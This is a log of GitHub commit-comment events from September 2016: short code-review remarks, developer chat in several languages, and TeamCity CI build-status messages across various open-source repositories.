{"id":"4509286512","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18882406,"position":42,"line":0,"path":"app/src/main/java/com/ruesga/rview/fragments/ChangeDetailsFragment.java","commit_id":"5870605d5f478a4a845995d900561bf461887f50","created_at":"2016-09-02T15:52:14Z","updated_at":"2016-09-02T15:52:14Z","body":"Remove me? :)"}},"created_at":"2016-09-02T15:52:14Z"}
{"id":"4509288107","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18882412,"position":null,"line":null,"path":null,"commit_id":"af9be157243a6d6d553381a56a83267a4256e557","created_at":"2016-09-02T15:52:31Z","updated_at":"2016-09-02T15:52:31Z","body":"can you plz cherry-pick this one into RB-2.1?"}},"created_at":"2016-09-02T15:52:31Z"}
{"id":"4509288946","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882413,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:52:42Z","updated_at":"2016-09-02T15:52:42Z","body":"скорее всего, ты его сам добавляешь."}},"created_at":"2016-09-02T15:52:42Z"}
{"id":"4509289231","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882414,"position":91,"line":64,"path":"content/themes/enhancv/assets/sass/partials/_singlepost.scss","commit_id":"bd72c66f74a258b3b9ab084da4243fc12b6f1aaf","created_at":"2016-09-02T15:52:45Z","updated_at":"2016-09-02T15:52:45Z","body":"Define :focus and :active here also if needed"}},"created_at":"2016-09-02T15:52:45Z"}
{"id":"4509289520","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18882416,"position":15,"line":0,"path":"app/src/main/java/com/ruesga/rview/fragments/ChangeDetailsFragment.java","commit_id":"5870605d5f478a4a845995d900561bf461887f50","created_at":"2016-09-02T15:52:49Z","updated_at":"2016-09-02T15:52:49Z","body":"Now that I see this, I remember that probably all contents of the fragment should be hidden if this is false."}},"created_at":"2016-09-02T15:52:49Z"}
{"id":"4509290506","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882420,"position":108,"line":78,"path":"content/themes/enhancv/assets/sass/partials/_singlepost.scss","commit_id":"bd72c66f74a258b3b9ab084da4243fc12b6f1aaf","created_at":"2016-09-02T15:53:01Z","updated_at":"2016-09-02T15:53:01Z","body":"User shorthand padding"}},"created_at":"2016-09-02T15:53:01Z"}
{"id":"4509291991","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18882425,"position":null,"line":null,"path":null,"commit_id":"578e4badc991ebd1c5c7e6573c402a39affd780f","created_at":"2016-09-02T15:53:18Z","updated_at":"2016-09-02T15:53:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 909](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12449&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T15:53:18Z"}
{"id":"4509293260","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882431,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:53:34Z","updated_at":"2016-09-02T15:53:34Z","body":"Но я же использую метод в самом конце"}},"created_at":"2016-09-02T15:53:34Z"}
{"id":"4509294768","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18882432,"position":30,"line":1572,"path":"Engine/AppManager.cpp","commit_id":"af9be157243a6d6d553381a56a83267a4256e557","created_at":"2016-09-02T15:53:50Z","updated_at":"2016-09-02T15:53:50Z","body":"isn't it NATRON_UNIX instead (eg linux, freebsd and friends), and you can do a ifdef NATRON_OSX inside it"}},"created_at":"2016-09-02T15:53:50Z"}
{"id":"4509296167","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882435,"position":9,"line":325,"path":"content/themes/enhancv/assets/sass/partials/_elements.scss","commit_id":"8f3c2413b738f3d5f72622ab7ea8ddfe1ddfcd43","created_at":"2016-09-02T15:54:09Z","updated_at":"2016-09-02T15:54:09Z","body":"Define :active and :focus if needed"}},"created_at":"2016-09-02T15:54:09Z"}
{"id":"4509296504","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882436,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:54:12Z","updated_at":"2016-09-02T15:54:12Z","body":"вообще, я бы на твоем месте добавлял бы символы переноса строки в нужные места списка,\r\nили бы даже заменял пробелы на переносы, а потом склеил бы его содержимое в одну строку -- это было бы гораздо эффективнее"}},"created_at":"2016-09-02T15:54:12Z"}
{"id":"4509298810","type":"CommitCommentEvent","actor":{"login":"olear"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18882445,"position":null,"line":null,"path":null,"commit_id":"af9be157243a6d6d553381a56a83267a4256e557","created_at":"2016-09-02T15:54:37Z","updated_at":"2016-09-02T15:54:37Z","body":"Ok."}},"created_at":"2016-09-02T15:54:37Z"}
{"id":"4509299136","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18882448,"position":14,"line":0,"path":"app/src/main/java/com/ruesga/rview/ChangeDetailsActivity.java","commit_id":"5870605d5f478a4a845995d900561bf461887f50","created_at":"2016-09-02T15:54:41Z","updated_at":"2016-09-02T15:54:41Z","body":"Why not check for the two_pane config here?"}},"created_at":"2016-09-02T15:54:41Z"}
{"id":"4509300950","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882454,"position":22,"line":84,"path":"content/themes/enhancv/assets/sass/partials/_navigation.scss","commit_id":"23564b7c8b40a59a8cc031231399e138959f30ba","created_at":"2016-09-02T15:55:04Z","updated_at":"2016-09-02T15:55:04Z","body":"px or rems?"}},"created_at":"2016-09-02T15:55:04Z"}
{"id":"4509305737","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882464,"position":6,"line":302,"path":"content/themes/enhancv/assets/sass/partials/_elements.scss","commit_id":"23564b7c8b40a59a8cc031231399e138959f30ba","created_at":"2016-09-02T15:55:59Z","updated_at":"2016-09-02T15:55:59Z","body":"there is no such font-weight for 99.99% of fonts in the world. Wtf?"}},"created_at":"2016-09-02T15:55:59Z"}
{"id":"4509308064","type":"CommitCommentEvent","actor":{"login":"soldier2"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":18882470,"position":null,"line":null,"path":null,"commit_id":"d149a2e6136ed2ee792770819cc9a79d790c96d9","created_at":"2016-09-02T15:56:25Z","updated_at":"2016-09-02T15:56:25Z","body":"Great job!"}},"created_at":"2016-09-02T15:56:25Z"}
{"id":"4509310097","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"generate/generate-package"},"payload":{"comment":{"id":18882476,"position":12,"line":12,"path":"templates/min.json","commit_id":"33c9d8a27eb8861f12aff15fc0237365d920e16a","created_at":"2016-09-02T15:56:49Z","updated_at":"2016-09-02T15:56:49Z","body":"i'm curious why you add `bugs` field it is auto-added in anyway, and there's a link in the npm page of the given package."}},"created_at":"2016-09-02T15:56:49Z"}
{"id":"4509311184","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882480,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:57:02Z","updated_at":"2016-09-02T15:57:02Z","body":"и нагляднее"}},"created_at":"2016-09-02T15:57:02Z"}
{"id":"4509313134","type":"CommitCommentEvent","actor":{"login":"HridayHS"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18882486,"position":null,"line":null,"path":null,"commit_id":"528560ebb2286642f23f63008538ad6fcc660264","created_at":"2016-09-02T15:57:25Z","updated_at":"2016-09-02T15:57:25Z","body":"https://github.com/yu-aosp-n/platform_manifest/commit/114cbb9723af29d2a77f10df31a81f4bd8daa419"}},"created_at":"2016-09-02T15:57:25Z"}
{"id":"4509314983","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882491,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:57:47Z","updated_at":"2016-09-02T15:57:47Z","body":"я пока еще не понял как реализовать переносы"}},"created_at":"2016-09-02T15:57:47Z"}
{"id":"4509315339","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882492,"position":14,"line":414,"path":"content/themes/enhancv/assets/sass/partials/_mediaqueries.scss","commit_id":"3486af0f5f6a6f2396c5f2f807114c7e1f1c0d45","created_at":"2016-09-02T15:57:51Z","updated_at":"2016-09-02T15:57:51Z","body":"Use the bootstrap variables for max-width media queries here"}},"created_at":"2016-09-02T15:57:51Z"}
{"id":"4509316284","type":"CommitCommentEvent","actor":{"login":"HridayHS"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18882493,"position":null,"line":null,"path":null,"commit_id":"528560ebb2286642f23f63008538ad6fcc660264","created_at":"2016-09-02T15:58:02Z","updated_at":"2016-09-02T15:58:02Z","body":"Thanks for compliment. :)"}},"created_at":"2016-09-02T15:58:02Z"}
{"id":"4509317515","type":"CommitCommentEvent","actor":{"login":"olear"},"repo":{"name":"MrKepzie/Natron"},"payload":{"comment":{"id":18882501,"position":30,"line":1572,"path":"Engine/AppManager.cpp","commit_id":"af9be157243a6d6d553381a56a83267a4256e557","created_at":"2016-09-02T15:58:17Z","updated_at":"2016-09-02T15:58:17Z","body":"FreeBSD is the only UNIX (except for OSX) that we support, and FreeBSD is under the define NATRON_LINUX. But I can of course change this to a ifdef NATRON_UNIX if wanted."}},"created_at":"2016-09-02T15:58:17Z"}
{"id":"4509318304","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882502,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:58:25Z","updated_at":"2016-09-02T15:58:25Z","body":"эээ, не переносы, а переводы строк"}},"created_at":"2016-09-02T15:58:25Z"}
{"id":"4509318984","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882504,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T15:58:32Z","updated_at":"2016-09-02T15:58:32Z","body":"переносы -- сложнее"}},"created_at":"2016-09-02T15:58:32Z"}
{"id":"4509321175","type":"CommitCommentEvent","actor":{"login":"amsheets"},"repo":{"name":"ReturnPath/EO_Analytics_Projects"},"payload":{"comment":{"id":18882512,"position":132,"line":293,"path":"Cert_Prospecting_Tool/Prospecting_Handoff_AScomments.R","commit_id":"986841768bfda5452228cc5146d949f6e1490fc7","created_at":"2016-09-02T15:58:57Z","updated_at":"2016-09-02T15:58:57Z","body":"Ah okay!  I was viewing this step as part of the \"final\" result as opposed to part of the exploration process.  Ignore my comment, then :-)  Definitely a good thing to understand how each step of tagging an IP as a \"prime\" prospect is a good thing to understand before implementing a final way to do it -- I would have done the exploration the same way."}},"created_at":"2016-09-02T15:58:57Z"}
{"id":"4509322480","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882520,"position":29,"line":207,"path":"content/themes/enhancv/assets/sass/partials/_navigation.scss","commit_id":"fd49ceb86f868bb81b60d517cdbb2f2b35398c00","created_at":"2016-09-02T15:59:13Z","updated_at":"2016-09-02T15:59:13Z","body":"Don't use uneven margins like 158px - it's eiher 160px or 150px or there is something wrong with your styles and sizes elsewhere!"}},"created_at":"2016-09-02T15:59:13Z"}
{"id":"4509326121","type":"CommitCommentEvent","actor":{"login":"Arinerron"},"repo":{"name":"karatebuilderboy/Launcher"},"payload":{"comment":{"id":18882529,"position":null,"line":null,"path":null,"commit_id":"8ecec369499d2a6336e35c438b23a03e181f734b","created_at":"2016-09-02T15:59:56Z","updated_at":"2016-09-02T15:59:56Z","body":"@karatebuilderboy Not really. They're is documentation in README.md though. If your scroll to the bottom of it, you'll see some example scripts made with it, but nothing really big. I did write a couple projects connecting a scratch project to Java that I can upload if you want."}},"created_at":"2016-09-02T15:59:56Z"}
{"id":"4509326859","type":"CommitCommentEvent","actor":{"login":"yar3333"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18882532,"position":null,"line":null,"path":null,"commit_id":"2ff0b8534b691bd927d8a80f6ef8e2879a695b1d","created_at":"2016-09-02T16:00:05Z","updated_at":"2016-09-02T16:00:05Z","body":"Before this fix promises was mostly unusable (\"then\" not works correcly in 50% cases ). So, it is not important as breaking change."}},"created_at":"2016-09-02T16:00:05Z"}
{"id":"4509330445","type":"CommitCommentEvent","actor":{"login":"fkennedy"},"repo":{"name":"ccle/moodle-mod_turnitintooltwo"},"payload":{"comment":{"id":18882546,"position":23,"line":854,"path":"turnitintooltwo_view.class.php","commit_id":"1fcef7ae4e95b8b469b48938a4f292111b930cbb","created_at":"2016-09-02T16:00:44Z","updated_at":"2016-09-02T16:00:44Z","body":"small letter t should be capital"}},"created_at":"2016-09-02T16:00:44Z"}
{"id":"4509332042","type":"CommitCommentEvent","actor":{"login":"goodslav"},"repo":{"name":"enhancv/blog"},"payload":{"comment":{"id":18882555,"position":16,"line":214,"path":"content/themes/enhancv/assets/sass/partials/_general.scss","commit_id":"e6508fd0508b3652660a0443e4f70547e5678d53","created_at":"2016-09-02T16:01:02Z","updated_at":"2016-09-02T16:01:02Z","body":"background-size: 30px 10px; Wtf? Why?"}},"created_at":"2016-09-02T16:01:02Z"}
{"id":"4509332272","type":"CommitCommentEvent","actor":{"login":"pabender"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18882556,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-02T16:01:06Z","updated_at":"2016-09-02T16:01:06Z","body":"Bob,\n\nOn Thu, Sep 1, 2016 at 8:40 PM, Bob Jacobsen <notifications@github.com>\nwrote:\n\n> Somehow, Eclipse is getting confused about which class definitions to use\n> for the annotations. (The situation is inherently confusing due to JSR-305\n> and JSR-308 overlapping)\n>\n> I’m not power user of Eclipse. My installed version is pretty old and\n> needs to be updated. I can work on that this weekend.\n>\n> As a test now, could you (somehow) which .jar file defines\n> `@CheckForNull`? It should be coming from lib/jsr305.jar. If it points to\n> somewhere else, that’s an indication of what’s going wrong.\n>\n\nI think we're seeing something related to this on the build server.  The\nBuilds have been failing since build 771, and if you look at the console\noutput:\n http://jmri.tagadab.com/jenkins/job/Development/job/Builds/774/console\n\nYou see two errors are complaining about `@CheckForNull` statements.\n\nPaul\n"}},"created_at":"2016-09-02T16:01:06Z"}
{"id":"4509333084","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18882562,"position":null,"line":null,"path":null,"commit_id":"528560ebb2286642f23f63008538ad6fcc660264","created_at":"2016-09-02T16:01:16Z","updated_at":"2016-09-02T16:01:16Z","body":"i am trying to build this for LG G3.\r\ni appreciate your work bro.\r\n\r\n\r\n"}},"created_at":"2016-09-02T16:01:16Z"}
{"id":"4509334950","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18882568,"position":null,"line":null,"path":null,"commit_id":"578e4badc991ebd1c5c7e6573c402a39affd780f","created_at":"2016-09-02T16:01:33Z","updated_at":"2016-09-02T16:01:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 909](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12449&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 213, ignored: 3 Build time: 00:08:15\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-02T16:01:33Z"}
{"id":"4509336120","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882571,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T16:01:45Z","updated_at":"2016-09-02T16:01:45Z","body":"Перевод строки это '\\n' ?\r\n"}},"created_at":"2016-09-02T16:01:45Z"}
{"id":"4509339632","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":18882588,"position":null,"line":null,"path":null,"commit_id":"566f5764ef01e342c5911cb34145d20ef50e60e9","created_at":"2016-09-02T16:02:25Z","updated_at":"2016-09-02T16:02:25Z","body":"да"}},"created_at":"2016-09-02T16:02:25Z"}
{"id":"4509339932","type":"CommitCommentEvent","actor":{"login":"HridayHS"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18882591,"position":null,"line":null,"path":null,"commit_id":"528560ebb2286642f23f63008538ad6fcc660264","created_at":"2016-09-02T16:02:29Z","updated_at":"2016-09-02T16:02:29Z","body":"You can contact me on Telegram @hridayhs ."}},"created_at":"2016-09-02T16:02:29Z"}
{"id":"4509345936","type":"CommitCommentEvent","actor":{"login":"siusin"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":18882625,"position":null,"line":null,"path":null,"commit_id":"f2e47c637f787169d881010591e0056f79e31c06","created_at":"2016-09-02T16:03:39Z","updated_at":"2016-09-02T16:03:39Z","body":"\\o/"}},"created_at":"2016-09-02T16:03:39Z"}
{"id":"4509348594","type":"CommitCommentEvent","actor":{"login":"kevinsawicki"},"repo":{"name":"electron/electron"},"payload":{"comment":{"id":18882635,"position":null,"line":null,"path":null,"commit_id":"8471f647a1675e79e0642743d703f7091f549628","created_at":"2016-09-02T16:04:10Z","updated_at":"2016-09-02T16:04:10Z","body":"Thanks for fixing this 🐍 "}},"created_at":"2016-09-02T16:04:10Z"}
{"id":"4509350826","type":"CommitCommentEvent","actor":{"login":"awikkerink"},"repo":{"name":"Brightspace/d2l-button-ui"},"payload":{"comment":{"id":18882641,"position":9,"line":61,"path":"d2l-button.html","commit_id":"edf86fc78c5c7573386ddc367a95c244e2a7b00a","created_at":"2016-09-02T16:04:36Z","updated_at":"2016-09-02T16:04:36Z","body":"@capajon See https://github.com/Brightspace/d2l-button-ui/blob/edf86fc78c5c7573386ddc367a95c244e2a7b00a/d2l-button.html#L57"}},"created_at":"2016-09-02T16:04:36Z"}
{"id":"4509351572","type":"CommitCommentEvent","actor":{"login":"ProditorMagnus"},"repo":{"name":"ProditorMagnus/Ageless-for-1-11"},"payload":{"comment":{"id":18882646,"position":null,"line":null,"path":null,"commit_id":"d5d8bfdabf77de3c225a28a32e5e52ce6bb1c2d4","created_at":"2016-09-02T16:04:46Z","updated_at":"2016-09-02T16:04:46Z","body":"Ah, era prefix only. I was already getting prepared to talk that changing unit ids needlessly is bad idea."}},"created_at":"2016-09-02T16:04:46Z"}
{"id":"4509360584","type":"CommitCommentEvent","actor":{"login":"vinothkannans"},"repo":{"name":"vinkas0/visa"},"payload":{"comment":{"id":18882674,"position":25,"line":47,"path":"app/Http/Controllers/Auth/SocialiteController.php","commit_id":"746a0529fb014f3c23bf4678c8d6c6854f0365d1","created_at":"2016-09-02T16:06:33Z","updated_at":"2016-09-02T16:06:33Z","body":"have to update oauth_user details with latest input"}},"created_at":"2016-09-02T16:06:33Z"}
{"id":"4509362330","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18882682,"position":null,"line":null,"path":null,"commit_id":"3e9afa229282fa3609c224051026ab80baa636d6","created_at":"2016-09-02T16:06:54Z","updated_at":"2016-09-02T16:06:54Z","body":"Sorry, missed: `(cherry picked from 1e665de6b48731718cf46868008a2e095ca44330)`"}},"created_at":"2016-09-02T16:06:54Z"}
{"id":"4509362683","type":"CommitCommentEvent","actor":{"login":"vinothkannans"},"repo":{"name":"vinkas0/visa"},"payload":{"comment":{"id":18882684,"position":24,"line":46,"path":"app/Http/Controllers/Auth/SocialiteController.php","commit_id":"746a0529fb014f3c23bf4678c8d6c6854f0365d1","created_at":"2016-09-02T16:06:58Z","updated_at":"2016-09-02T16:06:58Z","body":"have to update oauth_user details with latest input"}},"created_at":"2016-09-02T16:06:58Z"}
{"id":"4509363644","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18882687,"position":null,"line":null,"path":null,"commit_id":"240c629822bfe048b4e014c33694ae07ef17ec68","created_at":"2016-09-02T16:07:11Z","updated_at":"2016-09-02T16:07:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 910](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12452&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T16:07:11Z"}
{"id":"4509365004","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18882697,"position":null,"line":null,"path":null,"commit_id":"240c629822bfe048b4e014c33694ae07ef17ec68","created_at":"2016-09-02T16:07:25Z","updated_at":"2016-09-02T16:07:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 910](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12452&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:00:14"}},"created_at":"2016-09-02T16:07:25Z"}
{"id":"4509365747","type":"CommitCommentEvent","actor":{"login":"sc68cal"},"repo":{"name":"sc68cal/Kostyor"},"payload":{"comment":{"id":18882701,"position":69,"line":119,"path":"kostyor/tests/unit/rest_api/test.py","commit_id":"e1167b139352c0b54ce495d757b8dcc7391ab0d3","created_at":"2016-09-02T16:07:34Z","updated_at":"2016-09-02T16:07:34Z","body":"ahh crap this needs to be fixed and squashed"}},"created_at":"2016-09-02T16:07:34Z"}
{"id":"4509368935","type":"CommitCommentEvent","actor":{"login":"dhakajack"},"repo":{"name":"sussman/pogoman-go"},"payload":{"comment":{"id":18882709,"position":null,"line":null,"path":null,"commit_id":"bc913d7b212d44644048d75829fd512fba5c9cd0","created_at":"2016-09-02T16:08:13Z","updated_at":"2016-09-02T16:08:13Z","body":"Understand \"teal\" as the gym when the color of the location is teal. <-- is a problem phrase as soon as you get to a room that doesn't have a color attribute; triggers run time error right after the command is entered and grammar parsing starts. Didn't catch this until quite a few commits later."}},"created_at":"2016-09-02T16:08:13Z"}
{"id":"4509370411","type":"CommitCommentEvent","actor":{"login":"jmchilton"},"repo":{"name":"mvdbeek/galaxy"},"payload":{"comment":{"id":18882715,"position":15,"line":806,"path":"lib/galaxy/config.py","commit_id":"9f7c749638340fb63ac00a417a9e328875296885","created_at":"2016-09-02T16:08:30Z","updated_at":"2016-09-02T16:08:30Z","body":"Of course - thanks for the catch. 😳"}},"created_at":"2016-09-02T16:08:30Z"}
{"id":"4509373411","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18882724,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:09:06Z","updated_at":"2016-09-02T16:09:06Z","body":"hmm, works fine for me on angular 1.5.3, I wonder what the discrepancy is about.\r\n\r\n<img width=\"1088\" alt=\"screenshot 2016-09-02 11 08 26\" src=\"https://cloud.githubusercontent.com/assets/11214/18210340/a93a7348-70fd-11e6-9ce2-e75230337654.png\">\r\n"}},"created_at":"2016-09-02T16:09:06Z"}
{"id":"4509373529","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18882725,"position":null,"line":null,"path":null,"commit_id":"1cf51041b38391481d912622fac9f73e9cf712a2","created_at":"2016-09-02T16:09:08Z","updated_at":"2016-09-02T16:09:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 911](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12455&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-02T16:09:08Z"}
{"id":"4509378214","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18882736,"position":null,"line":null,"path":null,"commit_id":"1cf51041b38391481d912622fac9f73e9cf712a2","created_at":"2016-09-02T16:10:04Z","updated_at":"2016-09-02T16:10:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 911](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12455&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:56"}},"created_at":"2016-09-02T16:10:04Z"}
{"id":"4509378485","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18882739,"position":null,"line":null,"path":null,"commit_id":"6e5c07abdd9aa423393e706ff9d8298f4fe42cb8","created_at":"2016-09-02T16:10:09Z","updated_at":"2016-09-02T16:10:09Z","body":"What is least convincing to me is that `pawns`, `ei.pi->pawn_asymmetry()`, and `ei.pi->pawn_imbalance()` correlate too much with each other. I think we should either pick two (or even one, i.e.  `ei.pi->pawn_imbalance()`) or find more \"orthogonal\" factors..."}},"created_at":"2016-09-02T16:10:09Z"}
{"id":"4509378552","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"fabiolscs/EDL"},"payload":{"comment":{"id":18882740,"position":null,"line":null,"path":null,"commit_id":"a57dd4ab06ff788b18afbd074e339b7dc9b8d399","created_at":"2016-09-02T16:10:10Z","updated_at":"2016-09-02T16:10:10Z","body":"Você pode dar exemplos concretos (com código) na sua análise comparativa?"}},"created_at":"2016-09-02T16:10:10Z"}
{"id":"4509385568","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18882758,"position":null,"line":null,"path":null,"commit_id":"2ff0b8534b691bd927d8a80f6ef8e2879a695b1d","created_at":"2016-09-02T16:11:34Z","updated_at":"2016-09-02T16:11:34Z","body":"I also changed something here after this commit too, since it was still unusable with vshaxe :)"}},"created_at":"2016-09-02T16:11:34Z"}
{"id":"4509386312","type":"CommitCommentEvent","actor":{"login":"mattlewis92"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18882761,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:11:43Z","updated_at":"2016-09-02T16:11:43Z","body":"That's really weird, it's not working in this codepen: http://codepen.io/anon/pen/QKWOPK?editors=1011 or in unit tests :/"}},"created_at":"2016-09-02T16:11:43Z"}
{"id":"4509394443","type":"CommitCommentEvent","actor":{"login":"fkennedy"},"repo":{"name":"ccle/moodle-mod_turnitintooltwo"},"payload":{"comment":{"id":18882783,"position":19,"line":19,"path":"lang/en_us/turnitintooltwo.php","commit_id":"f04888288ff897937db6aac341d855052c4d05df","created_at":"2016-09-02T16:13:19Z","updated_at":"2016-09-02T16:13:19Z","body":"There should be a comma/period after \"Turnitin\"."}},"created_at":"2016-09-02T16:13:19Z"}
{"id":"4509396056","type":"CommitCommentEvent","actor":{"login":"virabot"},"repo":{"name":"virabot/-"},"payload":{"comment":{"id":18882789,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-02T16:13:39Z","updated_at":"2016-09-02T16:13:39Z","body":"8256"}},"created_at":"2016-09-02T16:13:39Z"}
{"id":"4509396619","type":"CommitCommentEvent","actor":{"login":"kellerb"},"repo":{"name":"irods/CMake"},"payload":{"comment":{"id":18882790,"position":null,"line":null,"path":null,"commit_id":"5ffa0d5d35b13b540c386995ce19aef5b66064b7","created_at":"2016-09-02T16:13:47Z","updated_at":"2016-09-02T16:13:47Z","body":"Sent email to cmake mailing list about this issue:\r\n\r\nhttps://cmake.org/pipermail/cmake/2016-May/063380.html"}},"created_at":"2016-09-02T16:13:47Z"}
